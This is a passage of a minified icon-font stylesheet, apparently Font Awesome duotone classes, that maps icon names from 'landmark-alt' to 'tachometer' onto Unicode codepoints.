a-landmark-alt:after{content:"\10f752"}.fad.fa-language:after{content:"\10f1ab"}.fad.fa-laptop:after{content:"\10f109"}.fad.fa-laptop-code:after{content:"\10f5fc"}.fad.fa-laptop-house:after{content:"\10e066"}.fad.fa-laptop-medical:after{content:"\10f812"}.fad.fa-lasso:after{content:"\10f8c8"}.fad.fa-laugh:after{content:"\10f599"}.fad.fa-laugh-beam:after{content:"\10f59a"}.fad.fa-laugh-squint:after{content:"\10f59b"}.fad.fa-laugh-wink:after{content:"\10f59c"}.fad.fa-layer-group:after{content:"\10f5fd"}.fad.fa-layer-minus:after{content:"\10f5fe"}.fad.fa-layer-plus:after{content:"\10f5ff"}.fad.fa-leaf:after{content:"\10f06c"}.fad.fa-leaf-heart:after{content:"\10f4cb"}.fad.fa-leaf-maple:after{content:"\10f6f6"}.fad.fa-leaf-oak:after{content:"\10f6f7"}.fad.fa-lemon:after{content:"\10f094"}.fad.fa-less-than:after{content:"\10f536"}.fad.fa-less-than-equal:after{content:"\10f537"}.fad.fa-level-down:after{content:"\10f149"}.fad.fa-level-down-alt:after{content:"\10f3be"}.fad.fa-level-up:after{content:"\10f148"}.fad.fa-level-up-alt:after{content:"\10f3bf"}.fad.fa-life-ring:after{content:"\10f1cd"}.fad.fa-light-ceiling:after{content:"\10e016"}.fad.fa-light-switch:after{content:"\10e017"}.fad.fa-light-switch-off:after{content:"\10e018"}.fad.fa-light-switch-on:after{content:"\10e019"}.fad.fa-lightbulb:after{content:"\10f0eb"}.fad.fa-lightbulb-dollar:after{content:"\10f670"}.fad.fa-lightbulb-exclamation:after{content:"\10f671"}.fad.fa-lightbulb-on:after{content:"\10f672"}.fad.fa-lightbulb-slash:after{content:"\10f673"}.fad.fa-lights-holiday:after{content:"\10f7b2"}.fad.fa-line-columns:after{content:"\10f870"}.fad.fa-line-height:after{content:"\10f871"}.fad.fa-link:after{content:"\10f0c1"}.fad.fa-lips:after{content:"\10f600"}.fad.fa-lira-sign:after{content:"\10f195"}.fad.fa-list:after{content:"\10f03a"}.fad.fa-list-alt:after{content:"\10f022"}.fad.fa-list-music:after{content:"\10f8c9"}.fad.fa-list-ol:after{content:"\10f0cb"}.fad.fa-list-ul:after{content:"\10f0ca"}.fad.fa-location:after{content:"\10f601"}.fad.fa-location-arrow:after{content:"\10f124"}.fad.fa-location-circle:after{content:"\10f602"}.fad.fa-location-slash:after{content:"\10f603"}.fad.fa-lock:after{content:"\10f023"}.fad.fa-lock-alt:after{content:"\10f30d"}.fad.fa-lock-open:after{content:"\10f3c1"}.fad.fa-lock-open-alt:after{content:"\10f3c2"}.fad.fa-long-arrow-alt-down:after{content:"\10f309"}.fad.fa-long-arrow-alt-left:after{content:"\10f30a"}.fad.fa-long-arrow-alt-right:after{content:"\10f30b"}.fad.fa-long-arrow-alt-up:after{content:"\10f30c"}.fad.fa-long-arrow-down:after{content:"\10f175"}.fad.fa-long-arrow-left:after{content:"\10f177"}.fad.fa-long-arrow-right:after{content:"\10f178"}.fad.fa-long-arrow-up:after{content:"\10f176"}.fad.fa-loveseat:after{content:"\10f4cc"}.fad.fa-low-vision:after{content:"\10f2a8"}.fad.fa-luchador:after{content:"\10f455"}.fad.fa-luggage-cart:after{content:"\10f59d"}.fad.fa-lungs:after{content:"\10f604"}.fad.fa-lungs-virus:after{content:"\10e067"}.fad.fa-mace:after{content:"\10f6f8"}.fad.fa-magic:after{content:"\10f0d0"}.fad.fa-magnet:after{content:"\10f076"}.fad.fa-mail-bulk:after{content:"\10f674"}.fad.fa-mailbox:after{content:"\10f813"}.fad.fa-male:after{content:"\10f183"}.fad.fa-mandolin:after{content:"\10f6f9"}.fad.fa-map:after{content:"\10f279"}.fad.fa-map-marked:after{content:"\10f59f"}.fad.fa-map-marked-alt:after{content:"\10f5a0"}.fad.fa-map-marker:after{content:"\10f041"}.fad.fa-map-marker-alt:after{content:"\10f3c5"}.fad.fa-map-marker-alt-slash:after{content:"\10f605"}.fad.fa-map-marker-check:after{content:"\10f606"}.fad.fa-map-marker-edit:after{content:"\10f607"}.fad.fa-map-marker-exclamation:after{content:"\10f608"}.fad.fa-map-marker-minus:after{content:"\10f609"}.fad.fa-map-marker-plus:after{content:"\10f60a"}.fad.fa-map-marker-question:after{content:"\10f60b"}.fad.fa-map-marker-slash:after{content:"\10f60c"}.fad.fa-map-marker-smile:after{content:"\10f60d"}.fad.fa-map-marker-times:after{content:"\10f60e"}.fad.fa-map-pin:after{content:"\10f276"}.fad.fa-map-signs:after{content:"\10f277"}.fad.fa-marker:after{content:"\10f5a1"}.fad.fa-mars:after{content:"\10f222"}.fad.fa-mars-double:after{content:"\10f227"}.fad.fa-mars-stroke:after{content:"\10f229"}.fad.fa-mars-stroke-h:after{content:"\10f22b"}.fad.fa-mars-stroke-v:after{content:"\10f22a"}.fad.fa-mask:after{content:"\10f6fa"}.fad.fa-meat:after{content:"\10f814"}.fad.fa-medal:after{content:"\10f5a2"}.fad.fa-medkit:after{content:"\10f0fa"}.fad.fa-megaphone:after{content:"\10f675"}.fad.fa-meh:after{content:"\10f11a"}.fad.fa-meh-blank:after{content:"\10f5a4"}.fad.fa-meh-rolling-eyes:after{content:"\10f5a5"}.fad.fa-memory:after{content:"\10f538"}.fad.fa-menorah:after{content:"\10f676"}.fad.fa-mercury:after{content:"\10f223"}.fad.fa-meteor:after{content:"\10f753"}.fad.fa-microchip:after{content:"\10f2db"}.fad.fa-microphone:after{content:"\10f130"}.fad.fa-microphone-alt:after{content:"\10f3c9"}.fad.fa-microphone-alt-slash:after{content:"\10f539"}.fad.fa-microphone-slash:after{content:"\10f131"}.fad.fa-microphone-stand:after{content:"\10f8cb"}.fad.fa-microscope:after{content:"\10f610"}.fad.fa-microwave:after{content:"\10e01b"}.fad.fa-mind-share:after{content:"\10f677"}.fad.fa-minus:after{content:"\10f068"}.fad.fa-minus-circle:after{content:"\10f056"}.fad.fa-minus-hexagon:after{content:"\10f307"}.fad.fa-minus-octagon:after{content:"\10f308"}.fad.fa-minus-square:after{content:"\10f146"}.fad.fa-mistletoe:after{content:"\10f7b4"}.fad.fa-mitten:after{content:"\10f7b5"}.fad.fa-mobile:after{content:"\10f10b"}.fad.fa-mobile-alt:after{content:"\10f3cd"}.fad.fa-mobile-android:after{content:"\10f3ce"}.fad.fa-mobile-android-alt:after{content:"\10f3cf"}.fad.fa-money-bill:after{content:"\10f0d6"}.fad.fa-money-bill-alt:after{content:"\10f3d1"}.fad.fa-money-bill-wave:after{content:"\10f53a"}.fad.fa-money-bill-wave-alt:after{content:"\10f53b"}.fad.fa-money-check:after{content:"\10f53c"}.fad.fa-money-check-alt:after{content:"\10f53d"}.fad.fa-money-check-edit:after{content:"\10f872"}.fad.fa-money-check-edit-alt:after{content:"\10f873"}.fad.fa-monitor-heart-rate:after{content:"\10f611"}.fad.fa-monkey:after{content:"\10f6fb"}.fad.fa-monument:after{content:"\10f5a6"}.fad.fa-moon:after{content:"\10f186"}.fad.fa-moon-cloud:after{content:"\10f754"}.fad.fa-moon-stars:after{content:"\10f755"}.fad.fa-mortar-pestle:after{content:"\10f5a7"}.fad.fa-mosque:after{content:"\10f678"}.fad.fa-motorcycle:after{content:"\10f21c"}.fad.fa-mountain:after{content:"\10f6fc"}.fad.fa-mountains:after{content:"\10f6fd"}.fad.fa-mouse:after{content:"\10f8cc"}.fad.fa-mouse-alt:after{content:"\10f8cd"}.fad.fa-mouse-pointer:after{content:"\10f245"}.fad.fa-mp3-player:after{content:"\10f8ce"}.fad.fa-mug:after{content:"\10f874"}.fad.fa-mug-hot:after{content:"\10f7b6"}.fad.fa-mug-marshmallows:after{content:"\10f7b7"}.fad.fa-mug-tea:after{content:"\10f875"}.fad.fa-music:after{content:"\10f001"}.fad.fa-music-alt:after{content:"\10f8cf"}.fad.fa-music-alt-slash:after{content:"\10f8d0"}.fad.fa-music-slash:after{content:"\10f8d1"}.fad.fa-narwhal:after{content:"\10f6fe"}.fad.fa-network-wired:after{content:"\10f6ff"}.fad.fa-neuter:after{content:"\10f22c"}.fad.fa-newspaper:after{content:"\10f1ea"}.fad.fa-not-equal:after{content:"\10f53e"}.fad.fa-notes-medical:after{content:"\10f481"}.fad.fa-object-group:after{content:"\10f247"}.fad.fa-object-ungroup:after{content:"\10f248"}.fad.fa-octagon:after{content:"\10f306"}.fad.fa-oil-can:after{content:"\10f613"}.fad.fa-oil-temp:after{content:"\10f614"}.fad.fa-om:after{content:"\10f679"}.fad.fa-omega:after{content:"\10f67a"}.fad.fa-ornament:after{content:"\10f7b8"}.fad.fa-otter:after{content:"\10f700"}.fad.fa-outdent:after{content:"\10f03b"}.fad.fa-outlet:after{content:"\10e01c"}.fad.fa-oven:after{content:"\10e01d"}.fad.fa-overline:after{content:"\10f876"}.fad.fa-page-break:after{content:"\10f877"}.fad.fa-pager:after{content:"\10f815"}.fad.fa-paint-brush:after{content:"\10f1fc"}.fad.fa-paint-brush-alt:after{content:"\10f5a9"}.fad.fa-paint-roller:after{content:"\10f5aa"}.fad.fa-palette:after{content:"\10f53f"}.fad.fa-pallet:after{content:"\10f482"}.fad.fa-pallet-alt:after{content:"\10f483"}.fad.fa-paper-plane:after{content:"\10f1d8"}.fad.fa-paperclip:after{content:"\10f0c6"}.fad.fa-parachute-box:after{content:"\10f4cd"}.fad.fa-paragraph:after{content:"\10f1dd"}.fad.fa-paragraph-rtl:after{content:"\10f878"}.fad.fa-parking:after{content:"\10f540"}.fad.fa-parking-circle:after{content:"\10f615"}.fad.fa-parking-circle-slash:after{content:"\10f616"}.fad.fa-parking-slash:after{content:"\10f617"}.fad.fa-passport:after{content:"\10f5ab"}.fad.fa-pastafarianism:after{content:"\10f67b"}.fad.fa-paste:after{content:"\10f0ea"}.fad.fa-pause:after{content:"\10f04c"}.fad.fa-pause-circle:after{content:"\10f28b"}.fad.fa-paw:after{content:"\10f1b0"}.fad.fa-paw-alt:after{content:"\10f701"}.fad.fa-paw-claws:after{content:"\10f702"}.fad.fa-peace:after{content:"\10f67c"}.fad.fa-pegasus:after{content:"\10f703"}.fad.fa-pen:after{content:"\10f304"}.fad.fa-pen-alt:after{content:"\10f305"}.fad.fa-pen-fancy:after{content:"\10f5ac"}.fad.fa-pen-nib:after{content:"\10f5ad"}.fad.fa-pen-square:after{content:"\10f14b"}.fad.fa-pencil:after{content:"\10f040"}.fad.fa-pencil-alt:after{content:"\10f303"}.fad.fa-pencil-paintbrush:after{content:"\10f618"}.fad.fa-pencil-ruler:after{content:"\10f5ae"}.fad.fa-pennant:after{content:"\10f456"}.fad.fa-people-arrows:after{content:"\10e068"}.fad.fa-people-carry:after{content:"\10f4ce"}.fad.fa-pepper-hot:after{content:"\10f816"}.fad.fa-percent:after{content:"\10f295"}.fad.fa-percentage:after{content:"\10f541"}.fad.fa-person-booth:after{content:"\10f756"}.fad.fa-person-carry:after{content:"\10f4cf"}.fad.fa-person-dolly:after{content:"\10f4d0"}.fad.fa-person-dolly-empty:after{content:"\10f4d1"}.fad.fa-person-sign:after{content:"\10f757"}.fad.fa-phone:after{content:"\10f095"}.fad.fa-phone-alt:after{content:"\10f879"}.fad.fa-phone-laptop:after{content:"\10f87a"}.fad.fa-phone-office:after{content:"\10f67d"}.fad.fa-phone-plus:after{content:"\10f4d2"}.fad.fa-phone-rotary:after{content:"\10f8d3"}.fad.fa-phone-slash:after{content:"\10f3dd"}.fad.fa-phone-square:after{content:"\10f098"}.fad.fa-phone-square-alt:after{content:"\10f87b"}.fad.fa-phone-volume:after{content:"\10f2a0"}.fad.fa-photo-video:after{content:"\10f87c"}.fad.fa-pi:after{content:"\10f67e"}.fad.fa-piano:after{content:"\10f8d4"}.fad.fa-piano-keyboard:after{content:"\10f8d5"}.fad.fa-pie:after{content:"\10f705"}.fad.fa-pig:after{content:"\10f706"}.fad.fa-piggy-bank:after{content:"\10f4d3"}.fad.fa-pills:after{content:"\10f484"}.fad.fa-pizza:after{content:"\10f817"}.fad.fa-pizza-slice:after{content:"\10f818"}.fad.fa-place-of-worship:after{content:"\10f67f"}.fad.fa-plane:after{content:"\10f072"}.fad.fa-plane-alt:after{content:"\10f3de"}.fad.fa-plane-arrival:after{content:"\10f5af"}.fad.fa-plane-departure:after{content:"\10f5b0"}.fad.fa-plane-slash:after{content:"\10e069"}.fad.fa-planet-moon:after{content:"\10e01f"}.fad.fa-planet-ringed:after{content:"\10e020"}.fad.fa-play:after{content:"\10f04b"}.fad.fa-play-circle:after{content:"\10f144"}.fad.fa-plug:after{content:"\10f1e6"}.fad.fa-plus:after{content:"\10f067"}.fad.fa-plus-circle:after{content:"\10f055"}.fad.fa-plus-hexagon:after{content:"\10f300"}.fad.fa-plus-octagon:after{content:"\10f301"}.fad.fa-plus-square:after{content:"\10f0fe"}.fad.fa-podcast:after{content:"\10f2ce"}.fad.fa-podium:after{content:"\10f680"}.fad.fa-podium-star:after{content:"\10f758"}.fad.fa-police-box:after{content:"\10e021"}.fad.fa-poll:after{content:"\10f681"}.fad.fa-poll-h:after{content:"\10f682"}.fad.fa-poll-people:after{content:"\10f759"}.fad.fa-poo:after{content:"\10f2fe"}.fad.fa-poo-storm:after{content:"\10f75a"}.fad.fa-poop:after{content:"\10f619"}.fad.fa-popcorn:after{content:"\10f819"}.fad.fa-portal-enter:after{content:"\10e022"}.fad.fa-portal-exit:after{content:"\10e023"}.fad.fa-portrait:after{content:"\10f3e0"}.fad.fa-pound-sign:after{content:"\10f154"}.fad.fa-power-off:after{content:"\10f011"}.fad.fa-pray:after{content:"\10f683"}.fad.fa-praying-hands:after{content:"\10f684"}.fad.fa-prescription:after{content:"\10f5b1"}.fad.fa-prescription-bottle:after{content:"\10f485"}.fad.fa-prescription-bottle-alt:after{content:"\10f486"}.fad.fa-presentation:after{content:"\10f685"}.fad.fa-print:after{content:"\10f02f"}.fad.fa-print-search:after{content:"\10f81a"}.fad.fa-print-slash:after{content:"\10f686"}.fad.fa-procedures:after{content:"\10f487"}.fad.fa-project-diagram:after{content:"\10f542"}.fad.fa-projector:after{content:"\10f8d6"}.fad.fa-pump-medical:after{content:"\10e06a"}.fad.fa-pump-soap:after{content:"\10e06b"}.fad.fa-pumpkin:after{content:"\10f707"}.fad.fa-puzzle-piece:after{content:"\10f12e"}.fad.fa-qrcode:after{content:"\10f029"}.fad.fa-question:after{content:"\10f128"}.fad.fa-question-circle:after{content:"\10f059"}.fad.fa-question-square:after{content:"\10f2fd"}.fad.fa-quidditch:after{content:"\10f458"}.fad.fa-quote-left:after{content:"\10f10d"}.fad.fa-quote-right:after{content:"\10f10e"}.fad.fa-quran:after{content:"\10f687"}.fad.fa-rabbit:after{content:"\10f708"}.fad.fa-rabbit-fast:after{content:"\10f709"}.fad.fa-racquet:after{content:"\10f45a"}.fad.fa-radar:after{content:"\10e024"}.fad.fa-radiation:after{content:"\10f7b9"}.fad.fa-radiation-alt:after{content:"\10f7ba"}.fad.fa-radio:after{content:"\10f8d7"}.fad.fa-radio-alt:after{content:"\10f8d8"}.fad.fa-rainbow:after{content:"\10f75b"}.fad.fa-raindrops:after{content:"\10f75c"}.fad.fa-ram:after{content:"\10f70a"}.fad.fa-ramp-loading:after{content:"\10f4d4"}.fad.fa-random:after{content:"\10f074"}.fad.fa-raygun:after{content:"\10e025"}.fad.fa-receipt:after{content:"\10f543"}.fad.fa-record-vinyl:after{content:"\10f8d9"}.fad.fa-rectangle-landscape:after{content:"\10f2fa"}.fad.fa-rectangle-portrait:after{content:"\10f2fb"}.fad.fa-rectangle-wide:after{content:"\10f2fc"}.fad.fa-recycle:after{content:"\10f1b8"}.fad.fa-redo:after{content:"\10f01e"}.fad.fa-redo-alt:after{content:"\10f2f9"}.fad.fa-refrigerator:after{content:"\10e026"}.fad.fa-registered:after{content:"\10f25d"}.fad.fa-remove-format:after{content:"\10f87d"}.fad.fa-repeat:after{content:"\10f363"}.fad.fa-repeat-1:after{content:"\10f365"}.fad.fa-repeat-1-alt:after{content:"\10f366"}.fad.fa-repeat-alt:after{content:"\10f364"}.fad.fa-reply:after{content:"\10f3e5"}.fad.fa-reply-all:after{content:"\10f122"}.fad.fa-republican:after{content:"\10f75e"}.fad.fa-restroom:after{content:"\10f7bd"}.fad.fa-retweet:after{content:"\10f079"}.fad.fa-retweet-alt:after{content:"\10f361"}.fad.fa-ribbon:after{content:"\10f4d6"}.fad.fa-ring:after{content:"\10f70b"}.fad.fa-rings-wedding:after{content:"\10f81b"}.fad.fa-road:after{content:"\10f018"}.fad.fa-robot:after{content:"\10f544"}.fad.fa-rocket:after{content:"\10f135"}.fad.fa-rocket-launch:after{content:"\10e027"}.fad.fa-route:after{content:"\10f4d7"}.fad.fa-route-highway:after{content:"\10f61a"}.fad.fa-route-interstate:after{content:"\10f61b"}.fad.fa-router:after{content:"\10f8da"}.fad.fa-rss:after{content:"\10f09e"}.fad.fa-rss-square:after{content:"\10f143"}.fad.fa-ruble-sign:after{content:"\10f158"}.fad.fa-ruler:after{content:"\10f545"}.fad.fa-ruler-combined:after{content:"\10f546"}.fad.fa-ruler-horizontal:after{content:"\10f547"}.fad.fa-ruler-triangle:after{content:"\10f61c"}.fad.fa-ruler-vertical:after{content:"\10f548"}.fad.fa-running:after{content:"\10f70c"}.fad.fa-rupee-sign:after{content:"\10f156"}.fad.fa-rv:after{content:"\10f7be"}.fad.fa-sack:after{content:"\10f81c"}.fad.fa-sack-dollar:after{content:"\10f81d"}.fad.fa-sad-cry:after{content:"\10f5b3"}.fad.fa-sad-tear:after{content:"\10f5b4"}.fad.fa-salad:after{content:"\10f81e"}.fad.fa-sandwich:after{content:"\10f81f"}.fad.fa-satellite:after{content:"\10f7bf"}.fad.fa-satellite-dish:after{content:"\10f7c0"}.fad.fa-sausage:after{content:"\10f820"}.fad.fa-save:after{content:"\10f0c7"}.fad.fa-sax-hot:after{content:"\10f8db"}.fad.fa-saxophone:after{content:"\10f8dc"}.fad.fa-scalpel:after{content:"\10f61d"}.fad.fa-scalpel-path:after{content:"\10f61e"}.fad.fa-scanner:after{content:"\10f488"}.fad.fa-scanner-image:after{content:"\10f8f3"}.fad.fa-scanner-keyboard:after{content:"\10f489"}.fad.fa-scanner-touchscreen:after{content:"\10f48a"}.fad.fa-scarecrow:after{content:"\10f70d"}.fad.fa-scarf:after{content:"\10f7c1"}.fad.fa-school:after{content:"\10f549"}.fad.fa-screwdriver:after{content:"\10f54a"}.fad.fa-scroll:after{content:"\10f70e"}.fad.fa-scroll-old:after{content:"\10f70f"}.fad.fa-scrubber:after{content:"\10f2f8"}.fad.fa-scythe:after{content:"\10f710"}.fad.fa-sd-card:after{content:"\10f7c2"}.fad.fa-search:after{content:"\10f002"}.fad.fa-search-dollar:after{content:"\10f688"}.fad.fa-search-location:after{content:"\10f689"}.fad.fa-search-minus:after{content:"\10f010"}.fad.fa-search-plus:after{content:"\10f00e"}.fad.fa-seedling:after{content:"\10f4d8"}.fad.fa-send-back:after{content:"\10f87e"}.fad.fa-send-backward:after{content:"\10f87f"}.fad.fa-sensor:after{content:"\10e028"}.fad.fa-sensor-alert:after{content:"\10e029"}.fad.fa-sensor-fire:after{content:"\10e02a"}.fad.fa-sensor-on:after{content:"\10e02b"}.fad.fa-sensor-smoke:after{content:"\10e02c"}.fad.fa-server:after{content:"\10f233"}.fad.fa-shapes:after{content:"\10f61f"}.fad.fa-share:after{content:"\10f064"}.fad.fa-share-all:after{content:"\10f367"}.fad.fa-share-alt:after{content:"\10f1e0"}.fad.fa-share-alt-square:after{content:"\10f1e1"}.fad.fa-share-square:after{content:"\10f14d"}.fad.fa-sheep:after{content:"\10f711"}.fad.fa-shekel-sign:after{content:"\10f20b"}.fad.fa-shield:after{content:"\10f132"}.fad.fa-shield-alt:after{content:"\10f3ed"}.fad.fa-shield-check:after{content:"\10f2f7"}.fad.fa-shield-cross:after{content:"\10f712"}.fad.fa-shield-virus:after{content:"\10e06c"}.fad.fa-ship:after{content:"\10f21a"}.fad.fa-shipping-fast:after{content:"\10f48b"}.fad.fa-shipping-timed:after{content:"\10f48c"}.fad.fa-shish-kebab:after{content:"\10f821"}.fad.fa-shoe-prints:after{content:"\10f54b"}.fad.fa-shopping-bag:after{content:"\10f290"}.fad.fa-shopping-basket:after{content:"\10f291"}.fad.fa-shopping-cart:after{content:"\10f07a"}.fad.fa-shovel:after{content:"\10f713"}.fad.fa-shovel-snow:after{content:"\10f7c3"}.fad.fa-shower:after{content:"\10f2cc"}.fad.fa-shredder:after{content:"\10f68a"}.fad.fa-shuttle-van:after{content:"\10f5b6"}.fad.fa-shuttlecock:after{content:"\10f45b"}.fad.fa-sickle:after{content:"\10f822"}.fad.fa-sigma:after{content:"\10f68b"}.fad.fa-sign:after{content:"\10f4d9"}.fad.fa-sign-in:after{content:"\10f090"}.fad.fa-sign-in-alt:after{content:"\10f2f6"}.fad.fa-sign-language:after{content:"\10f2a7"}.fad.fa-sign-out:after{content:"\10f08b"}.fad.fa-sign-out-alt:after{content:"\10f2f5"}.fad.fa-signal:after{content:"\10f012"}.fad.fa-signal-1:after{content:"\10f68c"}.fad.fa-signal-2:after{content:"\10f68d"}.fad.fa-signal-3:after{content:"\10f68e"}.fad.fa-signal-4:after{content:"\10f68f"}.fad.fa-signal-alt:after{content:"\10f690"}.fad.fa-signal-alt-1:after{content:"\10f691"}.fad.fa-signal-alt-2:after{content:"\10f692"}.fad.fa-signal-alt-3:after{content:"\10f693"}.fad.fa-signal-alt-slash:after{content:"\10f694"}.fad.fa-signal-slash:after{content:"\10f695"}.fad.fa-signal-stream:after{content:"\10f8dd"}.fad.fa-signature:after{content:"\10f5b7"}.fad.fa-sim-card:after{content:"\10f7c4"}.fad.fa-sink:after{content:"\10e06d"}.fad.fa-siren:after{content:"\10e02d"}.fad.fa-siren-on:after{content:"\10e02e"}.fad.fa-sitemap:after{content:"\10f0e8"}.fad.fa-skating:after{content:"\10f7c5"}.fad.fa-skeleton:after{content:"\10f620"}.fad.fa-ski-jump:after{content:"\10f7c7"}.fad.fa-ski-lift:after{content:"\10f7c8"}.fad.fa-skiing:after{content:"\10f7c9"}.fad.fa-skiing-nordic:after{content:"\10f7ca"}.fad.fa-skull:after{content:"\10f54c"}.fad.fa-skull-cow:after{content:"\10f8de"}.fad.fa-skull-crossbones:after{content:"\10f714"}.fad.fa-slash:after{content:"\10f715"}.fad.fa-sledding:after{content:"\10f7cb"}.fad.fa-sleigh:after{content:"\10f7cc"}.fad.fa-sliders-h:after{content:"\10f1de"}.fad.fa-sliders-h-square:after{content:"\10f3f0"}.fad.fa-sliders-v:after{content:"\10f3f1"}.fad.fa-sliders-v-square:after{content:"\10f3f2"}.fad.fa-smile:after{content:"\10f118"}.fad.fa-smile-beam:after{content:"\10f5b8"}.fad.fa-smile-plus:after{content:"\10f5b9"}.fad.fa-smile-wink:after{content:"\10f4da"}.fad.fa-smog:after{content:"\10f75f"}.fad.fa-smoke:after{content:"\10f760"}.fad.fa-smoking:after{content:"\10f48d"}.fad.fa-smoking-ban:after{content:"\10f54d"}.fad.fa-sms:after{content:"\10f7cd"}.fad.fa-snake:after{content:"\10f716"}.fad.fa-snooze:after{content:"\10f880"}.fad.fa-snow-blowing:after{content:"\10f761"}.fad.fa-snowboarding:after{content:"\10f7ce"}.fad.fa-snowflake:after{content:"\10f2dc"}.fad.fa-snowflakes:after{content:"\10f7cf"}.fad.fa-snowman:after{content:"\10f7d0"}.fad.fa-snowmobile:after{content:"\10f7d1"}.fad.fa-snowplow:after{content:"\10f7d2"}.fad.fa-soap:after{content:"\10e06e"}.fad.fa-socks:after{content:"\10f696"}.fad.fa-solar-panel:after{content:"\10f5ba"}.fad.fa-solar-system:after{content:"\10e02f"}.fad.fa-sort:after{content:"\10f0dc"}.fad.fa-sort-alpha-down:after{content:"\10f15d"}.fad.fa-sort-alpha-down-alt:after{content:"\10f881"}.fad.fa-sort-alpha-up:after{content:"\10f15e"}.fad.fa-sort-alpha-up-alt:after{content:"\10f882"}.fad.fa-sort-alt:after{content:"\10f883"}.fad.fa-sort-amount-down:after{content:"\10f160"}.fad.fa-sort-amount-down-alt:after{content:"\10f884"}.fad.fa-sort-amount-up:after{content:"\10f161"}.fad.fa-sort-amount-up-alt:after{content:"\10f885"}.fad.fa-sort-circle:after{content:"\10e030"}.fad.fa-sort-circle-down:after{content:"\10e031"}.fad.fa-sort-circle-up:after{content:"\10e032"}.fad.fa-sort-down:after{content:"\10f0dd"}.fad.fa-sort-numeric-down:after{content:"\10f162"}.fad.fa-sort-numeric-down-alt:after{content:"\10f886"}.fad.fa-sort-numeric-up:after{content:"\10f163"}.fad.fa-sort-numeric-up-alt:after{content:"\10f887"}.fad.fa-sort-shapes-down:after{content:"\10f888"}.fad.fa-sort-shapes-down-alt:after{content:"\10f889"}.fad.fa-sort-shapes-up:after{content:"\10f88a"}.fad.fa-sort-shapes-up-alt:after{content:"\10f88b"}.fad.fa-sort-size-down:after{content:"\10f88c"}.fad.fa-sort-size-down-alt:after{content:"\10f88d"}.fad.fa-sort-size-up:after{content:"\10f88e"}.fad.fa-sort-size-up-alt:after{content:"\10f88f"}.fad.fa-sort-up:after{content:"\10f0de"}.fad.fa-soup:after{content:"\10f823"}.fad.fa-spa:after{content:"\10f5bb"}.fad.fa-space-shuttle:after{content:"\10f197"}.fad.fa-space-station-moon:after{content:"\10e033"}.fad.fa-space-station-moon-alt:after{content:"\10e034"}.fad.fa-spade:after{content:"\10f2f4"}.fad.fa-sparkles:after{content:"\10f890"}.fad.fa-speaker:after{content:"\10f8df"}.fad.fa-speakers:after{content:"\10f8e0"}.fad.fa-spell-check:after{content:"\10f891"}.fad.fa-spider:after{content:"\10f717"}.fad.fa-spider-black-widow:after{content:"\10f718"}.fad.fa-spider-web:after{content:"\10f719"}.fad.fa-spinner:after{content:"\10f110"}.fad.fa-spinner-third:after{content:"\10f3f4"}.fad.fa-splotch:after{content:"\10f5bc"}.fad.fa-spray-can:after{content:"\10f5bd"}.fad.fa-sprinkler:after{content:"\10e035"}.fad.fa-square:after{content:"\10f0c8"}.fad.fa-square-full:after{content:"\10f45c"}.fad.fa-square-root:after{content:"\10f697"}.fad.fa-square-root-alt:after{content:"\10f698"}.fad.fa-squirrel:after{content:"\10f71a"}.fad.fa-staff:after{content:"\10f71b"}.fad.fa-stamp:after{content:"\10f5bf"}.fad.fa-star:after{content:"\10f005"}.fad.fa-star-and-crescent:after{content:"\10f699"}.fad.fa-star-christmas:after{content:"\10f7d4"}.fad.fa-star-exclamation:after{content:"\10f2f3"}.fad.fa-star-half:after{content:"\10f089"}.fad.fa-star-half-alt:after{content:"\10f5c0"}.fad.fa-star-of-david:after{content:"\10f69a"}.fad.fa-star-of-life:after{content:"\10f621"}.fad.fa-star-shooting:after{content:"\10e036"}.fad.fa-starfighter:after{content:"\10e037"}.fad.fa-starfighter-alt:after{content:"\10e038"}.fad.fa-stars:after{content:"\10f762"}.fad.fa-starship:after{content:"\10e039"}.fad.fa-starship-freighter:after{content:"\10e03a"}.fad.fa-steak:after{content:"\10f824"}.fad.fa-steering-wheel:after{content:"\10f622"}.fad.fa-step-backward:after{content:"\10f048"}.fad.fa-step-forward:after{content:"\10f051"}.fad.fa-stethoscope:after{content:"\10f0f1"}.fad.fa-sticky-note:after{content:"\10f249"}.fad.fa-stocking:after{content:"\10f7d5"}.fad.fa-stomach:after{content:"\10f623"}.fad.fa-stop:after{content:"\10f04d"}.fad.fa-stop-circle:after{content:"\10f28d"}.fad.fa-stopwatch:after{content:"\10f2f2"}.fad.fa-stopwatch-20:after{content:"\10e06f"}.fad.fa-store:after{content:"\10f54e"}.fad.fa-store-alt:after{content:"\10f54f"}.fad.fa-store-alt-slash:after{content:"\10e070"}.fad.fa-store-slash:after{content:"\10e071"}.fad.fa-stream:after{content:"\10f550"}.fad.fa-street-view:after{content:"\10f21d"}.fad.fa-stretcher:after{content:"\10f825"}.fad.fa-strikethrough:after{content:"\10f0cc"}.fad.fa-stroopwafel:after{content:"\10f551"}.fad.fa-subscript:after{content:"\10f12c"}.fad.fa-subway:after{content:"\10f239"}.fad.fa-suitcase:after{content:"\10f0f2"}.fad.fa-suitcase-rolling:after{content:"\10f5c1"}.fad.fa-sun:after{content:"\10f185"}.fad.fa-sun-cloud:after{content:"\10f763"}.fad.fa-sun-dust:after{content:"\10f764"}.fad.fa-sun-haze:after{content:"\10f765"}.fad.fa-sunglasses:after{content:"\10f892"}.fad.fa-sunrise:after{content:"\10f766"}.fad.fa-sunset:after{content:"\10f767"}.fad.fa-superscript:after{content:"\10f12b"}.fad.fa-surprise:after{content:"\10f5c2"}.fad.fa-swatchbook:after{content:"\10f5c3"}.fad.fa-swimmer:after{content:"\10f5c4"}.fad.fa-swimming-pool:after{content:"\10f5c5"}.fad.fa-sword:after{content:"\10f71c"}.fad.fa-sword-laser:after{content:"\10e03b"}.fad.fa-sword-laser-alt:after{content:"\10e03c"}.fad.fa-swords:after{content:"\10f71d"}.fad.fa-swords-laser:after{content:"\10e03d"}.fad.fa-synagogue:after{content:"\10f69b"}.fad.fa-sync:after{content:"\10f021"}.fad.fa-sync-alt:after{content:"\10f2f1"}.fad.fa-syringe:after{content:"\10f48e"}.fad.fa-table:after{content:"\10f0ce"}.fad.fa-table-tennis:after{content:"\10f45d"}.fad.fa-tablet:after{content:"\10f10a"}.fad.fa-tablet-alt:after{content:"\10f3fa"}.fad.fa-tablet-android:after{content:"\10f3fb"}.fad.fa-tablet-android-alt:after{content:"\10f3fc"}.fad.fa-tablet-rugged:after{content:"\10f48f"}.fad.fa-tablets:after{content:"\10f490"}.fad.fa-tachometer:after{content:"\10f0e4"}.fad.fa-tachometer-alt:after{content:"\10f3fd"}.fad.fa-tachometer-alt-average:after{content:"\10f624"}.fad.fa-tachometer-a